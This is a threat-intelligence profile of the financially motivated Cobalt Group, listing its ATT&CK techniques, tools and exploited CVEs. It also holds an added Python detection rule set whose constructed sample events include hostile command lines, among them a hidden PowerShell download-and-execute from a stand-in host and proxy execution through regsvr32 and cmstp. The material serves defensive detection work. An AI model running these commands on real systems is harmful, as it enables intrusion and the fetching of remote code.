G0080 Cobalt Group

Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money by targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to compromise organizations in order to use that access to then compromise additional victims.[11][10][9][7][8][5][6] Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak.[3]

Item | Value
--- | ---
ID | G0080
Associated Names | GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
Version | 2.1
Created | 17 October 2018
Last Modified | 22 March 2023

Associated Group Descriptions

Name | Description
--- | ---
GOLD KINGSWOOD | [2]
Cobalt Gang | [11][14]
Cobalt Spider | [1]

Techniques Used

Domain | ID | Name | Use
--- | --- | --- | ---
enterprise | T1548 | Abuse Elevation Control Mechanism | -
enterprise | T1548.002 | Bypass User Account Control | Cobalt Group has bypassed UAC.[7]
enterprise | T1071 | Application Layer Protocol | -
enterprise | T1071.001 | Web Protocols | Cobalt Group has used HTTPS for C2.[11][9][7]
enterprise | T1071.004 | DNS | Cobalt Group has used DNS tunneling for C2.[11][9][7]
enterprise | T1547 | Boot or Logon Autostart Execution | -
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.[7]
enterprise | T1037 | Boot or Logon Initialization Scripts | -
enterprise | T1037.001 | Logon Script (Windows) | Cobalt Group has added persistence by registering the file name for the next-stage malware under HKCU\Environment\UserInitMprLogonScript.[4]
enterprise | T1059 | Command and Scripting Interpreter | -
enterprise | T1059.001 | PowerShell | Cobalt Group has used powershell.exe to download and execute scripts.[11][10][9][7][6][12]
enterprise | T1059.003 | Windows Command Shell | Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.[4] The group has used an exploit toolkit known as Threadkit that launches .bat files.[11][10][7][4][13][12]
enterprise | T1059.005 | Visual Basic | Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that run upon user execution.[11][10][7][4][13][12]
enterprise | T1059.007 | JavaScript | Cobalt Group has executed JavaScript scriptlets on the victim's machine.[11][10][7][4][13][12]
enterprise | T1543 | Create or Modify System Process | -
enterprise | T1543.003 | Windows Service | Cobalt Group has created new services to establish persistence.[7]
enterprise | T1573 | Encrypted Channel | -
enterprise | T1573.002 | Asymmetric Cryptography | Cobalt Group has used the Plink utility to create SSH tunnels.[7]
enterprise | T1203 | Exploitation for Client Execution | Cobalt Group has exploited multiple vulnerabilities for execution, including Microsoft's Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.[11][10][9][8][5][6][1][12]
enterprise | T1068 | Exploitation for Privilege Escalation | Cobalt Group has used exploits to increase their levels of rights and privileges.[7]
enterprise | T1070 | Indicator Removal | -
enterprise | T1070.004 | File Deletion | Cobalt Group deleted the DLL dropper from the victim's machine to cover their tracks.[11]
enterprise | T1105 | Ingress Tool Transfer | Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.[10][9] The group's JavaScript backdoor is also capable of downloading files.[4]
enterprise | T1559 | Inter-Process Communication | -
enterprise | T1559.002 | Dynamic Data Exchange | Cobalt Group has sent malicious Word OLE compound documents to victims.[11]
enterprise | T1046 | Network Service Discovery | Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.[10][9][7]
enterprise | T1027 | Obfuscated Files or Information | -
enterprise | T1027.010 | Command Obfuscation | Cobalt Group obfuscated several scriptlets and code used on the victim's machine, including through use of XOR and RC4.[11][4]
enterprise | T1588 | Obtain Capabilities | -
enterprise | T1588.002 | Tool | Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.[9]
enterprise | T1566 | Phishing | -
enterprise | T1566.001 | Spearphishing Attachment | Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password-protected archives containing .exe and .scr executables.[11][10][9][7][8][5][13][12]
enterprise | T1566.002 | Spearphishing Link | Cobalt Group has sent emails with URLs pointing to malicious documents.[11][2]
enterprise | T1055 | Process Injection | Cobalt Group has injected code into trusted processes.[7]
enterprise | T1572 | Protocol Tunneling | Cobalt Group has used the Plink utility to create SSH tunnels.[11][9][7]
enterprise | T1219 | Remote Access Software | Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.[10][9][7]
enterprise | T1021 | Remote Services | -
enterprise | T1021.001 | Remote Desktop Protocol | Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.[7]
enterprise | T1053 | Scheduled Task/Job | -
enterprise | T1053.005 | Scheduled Task | Cobalt Group has created Windows tasks to establish persistence.[7]
enterprise | T1518 | Software Discovery | -
enterprise | T1518.001 | Security Software Discovery | Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.[4]
enterprise | T1195 | Supply Chain Compromise | -
enterprise | T1195.002 | Compromise Software Supply Chain | Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.[14]
enterprise | T1218 | System Binary Proxy Execution | -
enterprise | T1218.003 | CMSTP | Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.[11][4][13]
enterprise | T1218.008 | Odbcconf | Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.[12]
enterprise | T1218.010 | Regsvr32 | Cobalt Group has used regsvr32.exe to execute scripts.[11][4][12]
enterprise | T1204 | User Execution | -
enterprise | T1204.001 | Malicious Link | Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.[11][13][2]
enterprise | T1204.002 | Malicious File | Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.[11][13]
enterprise | T1220 | XSL Script Processing | Cobalt Group used msxsl.exe to bypass AppLocker and to invoke JScript code from an XSL file.[11]
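Several rows in the table above describe behaviours that leave a recognisable trace in endpoint telemetry: the signed-binary proxy execution rows (CMSTP, Odbcconf, Regsvr32, XSL Script Processing), PowerShell used as a downloader, and the two registry persistence locations (Run keys and HKCU\Environment\UserInitMprLogonScript). The following is an added example, not MITRE's code and not part of any cited report, that turns those rows into a small rule set run over constructed Sysmon-style events (Event ID 1 process creation, Event ID 13 registry value set). The field names, the sample command lines other than the cmstp.exe line quoted in the table, the example.invalid URLs and the SIDs are all constructed for this example; the rule thresholds are deliberately simple and would need tuning against a real environment's baseline.

```python
"""Rule set mapping a few Cobalt Group rows from the ATT&CK table to alerts.

Added example for this page. Events are constructed Sysmon-style records:
  event_id 1  = process creation (image, command_line)
  event_id 13 = registry value set (target_object)
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    event_id: int
    image: str = ""          # full image path of the created process (Event ID 1)
    command_line: str = ""   # full command line (Event ID 1)
    target_object: str = ""  # registry path that was written (Event ID 13)


@dataclass
class Alert:
    technique: str  # ATT&CK technique ID from the table above
    reason: str


def _exe(image: str) -> str:
    """Return the lower-cased file name of an image path (either slash style)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Download primitives commonly seen in PowerShell stagers (T1059.001).
_PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient")
# regsvr32 /i: pointing at a remote or .sct scriptlet rather than a local DLL (T1218.010).
_REGSVR32_SCRIPT = re.compile(r"/i:\S*(https?://|\.sct)")
# Per-user and machine Run / RunOnce keys (T1547.001).
_RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\")


def detect(event: Event) -> List[Alert]:
    """Apply every rule to one event and return the alerts it raises."""
    alerts: List[Alert] = []
    if event.event_id == 1:
        exe = _exe(event.image)
        cl = event.command_line.lower()
        tokens = cl.split()
        # T1218.003: cmstp.exe run silently (/s) on a file under a Temp directory.
        # A legitimate connection-manager install is interactive and ships its INF elsewhere.
        if exe == "cmstp.exe" and "/s" in tokens and "\\temp\\" in cl:
            alerts.append(Alert("T1218.003", "cmstp.exe silent install from a Temp path"))
        # T1220: msxsl.exe is rarely present on workstations at all; any execution is worth a look.
        if exe == "msxsl.exe":
            alerts.append(Alert("T1220", "msxsl.exe executed"))
        # T1218.010: regsvr32.exe asked to load a scriptlet instead of registering a DLL.
        if exe == "regsvr32.exe" and _REGSVR32_SCRIPT.search(cl):
            alerts.append(Alert("T1218.010", "regsvr32.exe /i: with remote or .sct scriptlet"))
        # T1218.008: odbcconf.exe referencing a DLL on its command line.
        if exe == "odbcconf.exe" and ".dll" in cl:
            alerts.append(Alert("T1218.008", "odbcconf.exe loading a DLL"))
        # T1059.001: PowerShell invoking a download primitive.
        if exe in ("powershell.exe", "pwsh.exe") and _PS_DOWNLOAD.search(cl):
            alerts.append(Alert("T1059.001", "PowerShell download primitive on command line"))
    elif event.event_id == 13:
        tgt = event.target_object.lower()
        # T1037.001: the logon-script value named in the table.
        if tgt.endswith("\\environment\\userinitmprlogonscript"):
            alerts.append(Alert("T1037.001", "UserInitMprLogonScript value written"))
        # T1547.001: a Run / RunOnce value written.
        if _RUN_KEY.search(tgt):
            alerts.append(Alert("T1547.001", "Run key value written"))
    return alerts


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, technique) for every alert across a batch of events."""
    return [(i, a.technique) for i, ev in enumerate(events) for a in detect(ev)]


# Constructed sample telemetry. Index 0 reuses the cmstp.exe command line quoted in the
# table; every other value (paths, URLs, SIDs) is made up for this example. The last two
# events are benign look-alikes that the rules should not flag.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\cmstp.exe",
          r"cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt"),
    Event(1, r"C:\Tools\msxsl.exe", r"msxsl.exe report.xml transform.xsl"),
    Event(1, r"C:\Windows\System32\regsvr32.exe",
          r"regsvr32.exe /s /i:https://example.invalid/u.sct scrobj.dll"),
    Event(1, r"C:\Windows\System32\odbcconf.exe",
          r"odbcconf.exe /a {REGSVR C:\Users\Public\stage.dll}"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
          ".DownloadString('https://example.invalid/s.ps1')\""),
    Event(13, target_object=r"HKU\S-1-5-21-1000\Environment\UserInitMprLogonScript"),
    Event(13, target_object=r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(1, r"C:\Windows\System32\regsvr32.exe",
          r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"),          # benign DLL registration
    Event(1, r"C:\Windows\System32\cmstp.exe", r"cmstp.exe C:\ProgramData\vpn\corp.inf"),  # benign install
]

if __name__ == "__main__":
    for idx, technique in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {technique} - {detect(SAMPLE_EVENTS[idx])[0].reason}")
```

The rules key on the process image name plus a narrow command-line feature rather than on the image alone, because every binary here except msxsl.exe is a legitimate Windows component with routine benign use; the two trailing sample events exist to make that distinction explicit. In a real deployment the same logic would run over Sysmon or Security log exports, and the Run-key rule in particular would need an allow-list of known software installers.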

Software

ID | Name | References | Techniques
--- | --- | --- | ---
S0154 | Cobalt Strike | [11][10][7][8][5][6][1][12] | Sudo and Sudo Caching:Abuse Elevation Control Mechanism; Bypass User Account Control:Abuse Elevation Control Mechanism; Token Impersonation/Theft:Access Token Manipulation; Make and Impersonate Token:Access Token Manipulation; Parent PID Spoofing:Access Token Manipulation; Domain Account:Account Discovery; Web Protocols:Application Layer Protocol; DNS:Application Layer Protocol; Application Layer Protocol; BITS Jobs; Browser Session Hijacking; Visual Basic:Command and Scripting Interpreter; Python:Command and Scripting Interpreter; JavaScript:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Standard Encoding:Data Encoding; Data from Local System; Protocol Impersonation:Data Obfuscation; Data Transfer Size Limits; Deobfuscate/Decode Files or Information; Asymmetric Cryptography:Encrypted Channel; Symmetric Cryptography:Encrypted Channel; Exploitation for Client Execution; Exploitation for Privilege Escalation; File and Directory Discovery; Process Argument Spoofing:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Modify Registry; Native API; Network Service Discovery; Network Share Discovery; Non-Application Layer Protocol; Indicator Removal from Tools:Obfuscated Files or Information; Obfuscated Files or Information; Office Template Macros:Office Application Startup; Security Account Manager:OS Credential Dumping; LSASS Memory:OS Credential Dumping; Local Groups:Permission Groups Discovery; Domain Groups:Permission Groups Discovery; Process Discovery; Process Hollowing:Process Injection; Process Injection; Dynamic-link Library Injection:Process Injection; Protocol Tunneling; Domain Fronting:Proxy; Internal Proxy:Proxy; Query Registry; Reflective Code Loading; Windows Remote Management:Remote Services; SMB/Windows Admin Shares:Remote Services; SSH:Remote Services; Remote Desktop Protocol:Remote Services; Distributed Component Object Model:Remote Services; Remote System Discovery; Scheduled Transfer; Screen Capture; Software Discovery; Code Signing:Subvert Trust Controls; Rundll32:System Binary Proxy Execution; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery; Service Execution:System Services; Pass the Hash:Use Alternate Authentication Material; Domain Accounts:Valid Accounts; Local Accounts:Valid Accounts; Windows Management Instrumentation
S0002 | Mimikatz | [10][9][7] | SID-History Injection:Access Token Manipulation; Account Manipulation; Security Support Provider:Boot or Logon Autostart Execution; Credentials from Password Stores; Windows Credential Manager:Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; LSASS Memory:OS Credential Dumping; DCSync:OS Credential Dumping; Security Account Manager:OS Credential Dumping; LSA Secrets:OS Credential Dumping; Rogue Domain Controller; Steal or Forge Authentication Certificates; Silver Ticket:Steal or Forge Kerberos Tickets; Golden Ticket:Steal or Forge Kerberos Tickets; Private Keys:Unsecured Credentials; Pass the Ticket:Use Alternate Authentication Material; Pass the Hash:Use Alternate Authentication Material
S0284 | More_eggs | [11][14] | Web Protocols:Application Layer Protocol; Windows Command Shell:Command and Scripting Interpreter; Standard Encoding:Data Encoding; Deobfuscate/Decode Files or Information; Symmetric Cryptography:Encrypted Channel; File Deletion:Indicator Removal; Ingress Tool Transfer; Obfuscated Files or Information; Security Software Discovery:Software Discovery; Code Signing:Subvert Trust Controls; Regsvr32:System Binary Proxy Execution; System Information Discovery; Internet Connection Discovery:System Network Configuration Discovery; System Network Configuration Discovery; System Owner/User Discovery
S0029 | PsExec | [10][7] | Domain Account:Create Account; Windows Service:Create or Modify System Process; Lateral Tool Transfer; SMB/Windows Admin Shares:Remote Services; Service Execution:System Services
S0195 | SDelete | [9] | Data Destruction; File Deletion:Indicator Removal
S0646 | SpicyOmelette | [2] | JavaScript:Command and Scripting Interpreter; Data from Local System; Ingress Tool Transfer; Spearphishing Link:Phishing; Remote System Discovery; Software Discovery; Security Software Discovery:Software Discovery; Code Signing:Subvert Trust Controls; System Information Discovery; System Network Configuration Discovery; Malicious Link:User Execution

References

1. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
2. CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.
3. Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.
4. Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
5. Klijnsma, Y. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.
6. Klijnsma, Y. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.
7. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
8. Mesa, M., et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.
9. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
10. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
11. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
12. Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.
13. Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial Actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.
14. CrowdStrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.